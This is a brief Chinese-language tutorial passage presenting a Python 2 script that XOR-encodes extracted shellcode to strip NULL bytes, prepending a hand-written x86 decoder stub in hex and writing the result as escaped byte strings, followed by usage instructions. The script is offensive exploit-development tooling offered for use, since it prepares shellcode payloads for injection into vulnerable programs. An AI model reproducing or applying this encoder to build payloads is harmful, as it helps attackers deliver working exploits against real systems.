通常为了简洁及防止NULL产生,ShellCode中会使用hash加密。而也有些时候,我们直接使用加密技术去除NULL:
#!/usr/bin/env python import os,sys,string #check the parameter if len(sys.argv) != 2: print 'UseAge: Encoder filename' sys.exit(1) # is file exists filepath = os.getcwd() + '\\' + sys.argv[1] if not os.path.exists(filepath): print '[!] Error: file not exists!' exit(1) else: fp = open(filepath,'r') # get each char to find the key code = [] line = "" KEY = range(0,256) lines = fp.readlines() for s in lines: line = line + s.replace('\n','') line = line.strip() for x in line.split(' '): y = int(x,16) if y in KEY: KEY.remove(y) code.append(x) print 'All the Keys can be used:\n' for key in KEY: print "%02X " % int(key), # enter a key to code key = raw_input('\n\nEnter the Key: ') key = int(key,16) # is a invalid key? if key not in KEY: print '[!] Key is invalid!' sys.exit(1) # encode and save it decode = [] tmp = "83 C4 14 33 C9 8A 1C 0C 80 F3 %02X 88 1C 0C 41 80 F9 %02X 75 F1" % (key,len(code)) fw = open(os.getcwd() + '\\encode.txt','w+') fw.write('\"') k = 0 for z in tmp.split(' '): k = k+1 if k%8==0: fw.write('\"\n\"') fw.write('\\x%s' % z) for i in range(len(code)): k = k+1 if k%8==0: fw.write('\"\n\"') fw.write('\\x%02X' % (int(code[i],16)^key)) fw.write('\"\n\ntotal bytes: %d' % k) print '[+] Done!' fw.close() fp.close()
用法示例:
传入才提取出来的shellcode.txt,然后“encoder.py shellcode.txt”,选择一个列出的可用的key,然后会在当前目录下产生encoder.txt。
